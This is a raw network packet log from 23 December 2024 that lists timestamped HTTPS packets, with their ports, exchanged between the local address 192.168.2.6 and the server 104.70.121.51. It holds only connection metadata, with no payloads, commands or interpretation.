                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.573468924 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.577573061 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.628706932 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.628751040 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.633730888 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634032965 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634351969 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634373903 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634387016 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634490013 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634501934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634514093 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.634587049 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.637984037 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638282061 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638294935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638561010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638736010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638748884 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638833046 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638844967 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638907909 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638919115 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638930082 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.638942957 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.639146090 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.646666050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.646734953 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.646812916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.646929979 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.646941900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.646991968 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647003889 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647015095 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647027016 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647185087 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647361994 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647572994 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.647798061 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.655855894 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.655874968 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.655991077 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656003952 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656160116 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656177998 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656189919 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656267881 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656281948 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.656469107 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.663784027 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.668452978 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.760478020 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766102076 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766340017 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766412973 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766474962 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766489029 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766519070 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766628027 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766674995 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766686916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766798019 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766807079 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.766809940 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.767277956 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.774516106 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.799753904 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.828294992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835269928 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835673094 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835696936 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835709095 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835792065 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835855961 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835869074 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.835880041 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.836016893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.836030960 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.836038113 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.836045027 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.836219072 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843195915 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843270063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843405008 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843416929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843437910 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843450069 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.843461990 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.850042105 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.891715050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900100946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900116920 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900230885 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900243044 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900254965 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900367975 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900387049 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900398970 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900409937 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900423050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900434971 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900475979 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.900660038 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.907721996 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.907769918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.945880890 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.946190119 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.952256918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.960124969 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.960177898 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.960200071 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.960215092 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.960227966 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.960740089 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.963912964 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.979340076 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.987569094 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.987591982 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.987930059 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.988044024 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.988068104 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.988080025 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.989634037 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.990673065 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.996778965 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997447968 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997459888 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997486115 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997499943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997514009 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997526884 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997543097 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997689962 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997710943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997726917 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.997828960 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:16.998043060 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.005795002 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.005857944 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.012011051 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.045981884 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.107359886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.166507959 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.173814058 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.173890114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.173924923 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.173978090 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174000025 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174012899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174137115 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174170971 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174184084 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174194098 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.174360037 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.178827047 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.239434958 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.260895014 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278124094 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278635979 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278687000 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278700113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278906107 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278918028 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278932095 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.278943062 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.281879902 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.286726952 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.295716047 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.295785904 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.295809984 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.295974970 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.304735899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313079119 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313194036 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313244104 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313263893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313277006 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313369989 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313448906 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313462019 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313473940 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313487053 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.313498020 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.320640087 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.320744991 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.326204062 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334389925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334500074 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334553003 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334611893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334625006 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334763050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334775925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334830046 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334841013 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334853888 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.334949970 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342411995 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342432976 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342446089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342521906 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342587948 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342603922 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342616081 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.342694998 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.346664906 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.346919060 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.347183943 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.347783089 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.348032951 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.361651897 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.367398024 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.367733002 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.367899895 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368096113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368108034 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368217945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368230104 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368642092 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368654966 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.368665934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.380590916 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.405824900 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.459069967 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.492924929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.499649048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.499739885 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.499754906 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.499764919 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.500246048 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.530426025 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.573245049 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.586113930 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.604965925 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.605341911 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.620207071 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.685548067 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.718826056 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.782361031 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.787297010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.787308931 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.787365913 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.787377119 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.787388086 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.787638903 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.816068888 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.816442013 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.838809967 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.888578892 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.894336939 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.894399881 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.894485950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.894501925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:17.895351887 CET52290443192.168.2.6104.70.121.51
